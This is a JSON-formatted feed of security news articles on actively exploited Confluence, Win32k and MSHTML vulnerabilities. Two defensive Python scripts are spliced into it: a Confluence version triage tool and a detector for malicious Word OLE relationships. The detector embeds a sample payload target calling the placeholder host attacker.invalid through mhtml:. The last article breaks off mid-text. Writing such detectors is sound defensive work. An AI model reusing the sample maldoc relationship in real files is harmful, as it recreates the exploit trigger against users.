"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgtFRIbOmYLbsTQsfQcmDa8dd7UbU-isTy7dToS2Gy1p7s--Zt-QgfjUpligZQwwZouhjIgGzL8kjD1QlluSfAvuZ7I7GKPJG21wA9tfWYRmChZ7jK57W-8AeMWNQDwHO9tEJkbBfs3AltDvfY7kp3Bl13jp3djDlSN_7F0g5plbOk_BGleGYX9aFNC/s728-e100/hackers.jpg>)\n\nAtlassian has warned of a critical unpatched remote code 
execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild.\n\nThe Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as **CVE-2022-26134**.\n\n\"Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server,\" it [said](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) in an advisory.\n\n\"There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix.\" Specifics of the security flaw have been withheld until a software patch is available.\n\nAll supported versions of Confluence Server and Data Center are affected, although it's expected that all versions of the enterprise solution are potentially vulnerable. The earliest impacted version is yet to be ascertained.\n\nIn the absence of a fix, Atlassian is urging customers to restrict Confluence Server and Data Center instances from the internet or consider disabling the instances altogether. Alternatively, it has recommended implementing a web application firewall (WAF) rule which blocks URLs containing \"${\" to reduce the risk.\n\nVolexity, in an independent disclosure, said it detected the activity over the Memorial Day weekend in the U.S. 
as part of an incident response investigation.\n\nThe attack chain involved leveraging the Atlassian zero-day exploit \u2014 a command injection vulnerability \u2014 to achieve unauthenticated remote code execution on the server, enabling the threat actor to use the foothold to drop the Behinder web shell.\n\n\"[Behinder](<https://github.com/Freakboy/Behinder>) provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike,\" the researchers [said](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). \"At the same time, it does not allow persistence, which means a reboot or service restart will wipe it out.\"\n\nSubsequently, the web shell is said to have been employed as a conduit to deploy two additional web shells to disk, including [China Chopper](<https://www.mandiant.com/resources/the-little-malware-that-could-detecting-and-defeating-the-china-chopper-web-shell>) and a custom file upload shell to exfiltrate arbitrary files to a remote server.\n\nThe development comes less than a year after another critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild to install cryptocurrency miners on compromised servers.\n\n\"By exploiting this kind of vulnerability, attackers can gain direct access to highly sensitive systems and networks,\" Volexity said. \"Further, these systems can often be difficult to investigate, as they lack the appropriate monitoring or logging capabilities.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T03:43:00", "type": "thn", "title": "Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-03T09:27:09", "id": "THN:573D61ED9CCFF01AECC281F8913E42F8", "href": "https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:35", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhOB2VqcpzvIvbqWJmlBkCMLbnUxk3Z5xT2z3m3Gq-YuuBlN_NqdLRsokokD3U-FEY86UgsPht9jJl64elkaTldrF5sP92LWMSa6SiRtCYAh531p1yOcpxfIcK7KxbUiT4AcuUBJjXXV-KoHFwXcRxhZiXlPt_nDcSDmlAdw1IQJzBJ_AKFxIs-zvlV>)\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) is urging federal agencies to secure their systems against an actively exploited security vulnerability in Windows that could be abused to gain elevated permissions on affected hosts.\n\nTo that end, the agency has added [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) (CVSS score: 7.0) to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), necessitating that Federal Civilian Executive Branch (FCEB) agencies patch all systems against this vulnerability by February 18, 2022.\n\n\"These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise,\" CISA [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/04/cisa-adds-one-known-exploited-vulnerability-catalog>) in an advisory published last week.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEi_i5GcfQrAT38f9axbzmFO-Sp4pa-68-q21bq9ALE0pr3rtd7YlA1XdpzF_M0ipJE_4ckPGcdP2bX7xhUeQIbU_JpRuDg5QbRJrTDOpgnI3EmoXugjloJtH_JOaWEeDDLiPE54NUuVokjdewdmpU6RxL1iBbRgZKIod0B73dVQnznjvTQNCy2MQ0sf>)\n\n[CVE-2022-21882](<https://github.com/L4ys/CVE-2022-21882>), which has been tagged with an \"Exploitation More Likely\" exploitability index assessment, concerns a case of elevation of privilege vulnerability affecting the Win32k component. The bug was addressed by Microsoft as part of its January 2022 [Patch Tuesday](<https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html>) updates.\n\n\"A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver,\" the Windows maker said. 
The flaw impacts Windows 10, Windows 11, Windows Server 2019, and Windows server 2022.\n\nIt's worth noting that the [security vulnerability](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) is also a [bypass](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) for another escalation of privilege flaw in the same module ([CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), CVSS score: 7.8) that Microsoft resolved in [February 2021](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) and has since been detected in [exploits in the wild](<https://www.cisa.gov/uscert/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T05:03:00", "type": "thn", "title": "CISA Orders Federal Agencies to Patch Actively Exploited Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": 
It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. 
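The four affected ranges above are per release branch, so a single "older than 7.12.5" comparison gets triage wrong on every branch that was fixed separately (6.13.23, 7.4.11 and 7.11.6 are all patched). The following Python is an added example for this page, not Atlassian's or the researchers' code: it encodes the advisory's ranges, parses version strings as they appear in inventories (including a build suffix such as 7.4.11-1), and returns for each host in a constructed inventory the release it has to move to.

```python
"""Triage a Confluence inventory against the CVE-2021-26084 ranges listed in
Atlassian's advisory.  Added illustration for this page, not Atlassian's code;
the inventory below is constructed."""

# Each branch is vulnerable from the first version in it up to, but excluding,
# the release that fixed it: everything before 6.13.23, 6.14.0 through 7.4.10,
# 7.5.0 through 7.11.5, 7.12.0 through 7.12.4.  7.13.0 shipped fixed.
AFFECTED_RANGES = (
    ((0, 0, 0), (6, 13, 23)),
    ((6, 14, 0), (7, 4, 11)),
    ((7, 5, 0), (7, 11, 6)),
    ((7, 12, 0), (7, 12, 5)),
)


def parse_version(text):
    """'7.12.4' -> (7, 12, 4).  Accepts 'x.y' and a build suffix like '7.4.11-1'."""
    core = text.strip().split("-", 1)[0]
    parts = tuple(int(p) for p in core.split("."))
    if len(parts) < 2 or len(parts) > 4:
        raise ValueError("not a Confluence version: %r" % text)
    return parts + (0,) * (3 - len(parts))


def recommended_fix(version):
    """Lowest fixed release on the running branch, or None when already fixed.
    A naive 'version < 7.12.5' test would wrongly flag 6.13.23, 7.4.11 and
    7.11.6, which are all patched on their own branches."""
    v = parse_version(version)
    for lo, hi in AFFECTED_RANGES:
        if lo <= v < hi:
            return ".".join(str(n) for n in hi)
    return None


def is_vulnerable(version):
    return recommended_fix(version) is not None


def triage(inventory):
    """inventory: iterable of (host, version).  Returns [(host, version, fix)]
    for hosts that still need an upgrade, oldest running version first."""
    todo = [(host, ver, recommended_fix(ver)) for host, ver in inventory]
    todo = [t for t in todo if t[2] is not None]
    return sorted(todo, key=lambda t: parse_version(t[1]))


# Constructed sample inventory: hostnames and versions are illustrative.
SAMPLE_INVENTORY = [
    ("wiki-legacy", "6.13.22"),
    ("wiki-old", "6.13.23"),
    ("wiki-lts", "7.4.10"),
    ("wiki-lts-patched", "7.4.11-1"),
    ("wiki-prod", "7.12.4"),
    ("wiki-new", "7.13.0"),
]

if __name__ == "__main__":
    for host, ver, fix in triage(SAMPLE_INVENTORY):
        print("%-18s %-9s upgrade to %s" % (host, ver, fix))
```

Feed it the version strings your asset inventory or the Confluence login page footer reports; the comparison is on parsed integer tuples, so 7.4.10 sorts before 7.12.4 rather than after it as a string compare would.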
Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. 
Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjYUPLUjcZm_IOi_2W8OCO67vRS3dKYHbn9uyV27yUDW18dhUv8jXFX9JDvQYw6FCzwj__3eQkTEwAOG-s6nigko_jBV77WQl46SxYEsGMQxc5g2hIFfR11hGm-vi1oobscaw6jTNgq2ed6ZN5OE9wz9JHWzNk0PH1xq9WzsWMs18Gk_P_yhPWT0YQm>)\n\nA new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims with a previously undocumented PowerShell-based information stealer designed to harvest extensive details from infected machines.\n\n\"[T]he stealer is a PowerShell script, short with powerful collection capabilities \u2014 in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment,\" SafeBreach Labs researcher Tomer Bar [said](<https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/>) in a report published Wednesday.\n\nNearly half of the targets are from 
the U.S., with the cybersecurity firm noting that the attacks are likely aimed at \"Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.\"\n\nThe phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be exploited using specially crafted Microsoft Office documents. The vulnerability was [patched](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) by Microsoft in September 2021, weeks after [reports](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) of active exploitation emerged in the wild.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgHnByMecpjc8CwGXlYLKRdnKgH6K5l2WpL2UN8Tsn4OgwoQxswAm4WoSD9d7rUtLNPFN59Z11rRxwTC3ZRa4tu-3rpZvcB0cO59nDNhYGmpe6L38Tx8Y-merXNp54673AbqS20eHA5cJ4CBUQ0KjBxCH5it3HfxkZ0_bBtO1JWp3_1j6rxKqM_SMJv>)\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" the Windows maker had noted.\n\nThe attack sequence described by SafeBreach begins with the targets receiving a spear-phishing email that comes with a Word document as an attachment. 
Opening the file triggers the exploit for CVE-2021-40444, resulting in the execution of a PowerShell script dubbed \"PowerShortShell\" that's capable of hoovering up sensitive information and transmitting it to a command-and-control (C2) server.\n\nWhile infections involving the deployment of the info-stealer were observed on September 15, a day after Microsoft issued patches for the flaw, the aforementioned C2 server was also employed to harvest victims' Gmail and Instagram credentials as part of two phishing campaigns staged by the same adversary in July 2021. \n\nThe development is the latest in a string of attacks that have capitalized on the MSHTML rendering engine flaw, with Microsoft previously [disclosing](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that abused the vulnerability as part of an initial access campaign to distribute custom Cobalt Strike Beacon loaders.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T11:33:00", "type": "thn", "title": "Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-22T07:07:24", "id": "THN:C4188C7A44467E425407D33067C14094", "href": "https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:47", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8>)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker,\" SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) in a new report published Tuesday.\n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. 
Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>), it has been put to use in [multiple attacks](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) ever since details pertaining to the flaw became public.\n\nThat same month, the technology giant [uncovered](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs [reported](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available [proof-of-concept Office exploit](<https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf>) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \"too-narrowly focused patch.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB>)\n\n\"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\" the researchers explained. 
\"When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\"\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a Windows Script Host ([WSH](<https://en.wikipedia.org/wiki/Windows_Script_Host>)) script and a Word document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nThat JavaScript then used the Word document as a conduit to launch the WSH script and execute a PowerShell command embedded in the RAR file, which retrieved the [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>) malware payload from an attacker-controlled website.\n\nAs for why the exploit disappeared after a little over a day of use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. \"So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\" the researchers said.\n\n\"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\" SophosLabs Principal Researcher Andrew Brandt said. \"Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button.\"\n\n\"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know,\" Brandt added. 
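What both chains have in common, the original CAB-based one Microsoft described and the CAB-less variant above, is the document-side trigger: no macro, just an Office Open XML relationship that makes Word reach out for a remote OLE object when the file is opened, which is how MSHTML gets handed the attacker's HTML. The following Python is an added example for this page, not code from Microsoft, Sophos or SafeBreach: it opens a .docx as the ZIP it is, parses every .rels part, and reports external OLE object relationships whose target uses the mhtml: handler or otherwise points at a URL, while leaving ordinary external hyperlinks alone. Both sample documents are constructed in memory and attacker.invalid is a placeholder host, not a real indicator.

```python
"""Triage Office Open XML documents for the CVE-2021-40444 document-side trigger:
an external OLE object relationship that fetches remote content (mhtml:/http).
Added illustration for this page, not Microsoft's, Sophos's or SafeBreach's code.
Sample documents are constructed in memory; attacker.invalid is a placeholder."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
# Targets that leave the document: the mhtml: protocol handler or a plain URL.
REMOTE_TARGET = re.compile(r"^(mhtml:|https?://|file:)", re.IGNORECASE)


def find_remote_ole_relationships(docx_bytes):
    """Return [(rels_part, rel_id, target)] for every relationship that is
    TargetMode="External" and either uses mhtml: or is an OLE object whose
    target is a URL.  A plain external hyperlink is normal and is not reported."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                # mhtml: has no business in a document regardless of type; for
                # http/file targets insist on the oleObject type so ordinary
                # hyperlinks do not produce false positives.
                uses_mhtml = target.lower().startswith("mhtml:")
                remote_ole = (rel.get("Type") == OLE_REL_TYPE
                              and REMOTE_TARGET.match(target) is not None)
                if external and (uses_mhtml or remote_ole):
                    hits.append((part, rel.get("Id"), target))
    return hits


def build_docx(document_rels_xml):
    """Assemble the minimum ZIP layout a .docx needs for this check (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", document_rels_xml)
    return buf.getvalue()


# Constructed benign sample: a styles part and a normal external hyperlink.
BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="%s">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>
</Relationships>""" % REL_NS

# Constructed maldoc-shaped sample: an external oleObject whose target goes
# through the mhtml: handler with an x-usc: suffix.  Placeholder host only.
MALDOC_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="%s">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId5" Type="%s" Target="mhtml:http://attacker.invalid/word.html!x-usc:http://attacker.invalid/word.html" TargetMode="External"/>
</Relationships>""" % (REL_NS, OLE_REL_TYPE)


if __name__ == "__main__":
    for label, rels in (("benign.docx", BENIGN_RELS), ("maldoc.docx", MALDOC_RELS)):
        print(label, find_remote_ole_relationships(build_docx(rels)))
```

Run it over mail-gateway quarantine or a sample set with `find_remote_ole_relationships(open(path, "rb").read())`; it is a triage filter, not a verdict, since a relationship that reaches out is only the first step of the chain and the remote HTML decides what happens next.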
When reached for a response, a Microsoft spokesperson said \"we are investigating these reports and will take appropriate action as needed to help keep customers protected.\"\n\n**_Update:_** Microsoft told The Hacker News that the aforementioned exploit was indeed addressed with security updates that were released in September 2021. Sophos now notes that the CAB-less 40444 exploit \"may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack\" and that the patch blocks the malicious behavior.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-22T07:45:00", "type": "thn", "title": "New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-29T03:33:40", "id": 
"THN:8A60310AB796B7372A105B7C8811306B", "href": "https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ>)\n\nCybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.\n\nThe attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix \u2014 a new company created following the merger of security firms McAfee Enterprise and FireEye \u2014 said in a [report](<https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html>) shared with The Hacker News.\n\n\"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic,\" Trellix explained.\n\nFirst signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.\n\n\"The attack is particularly unique due to the prominence of its victims, the use of a recent [security flaw], and the use of an attack technique that the team had not seen before,\" Christiaan Beek, lead scientist at Trellix, said. 
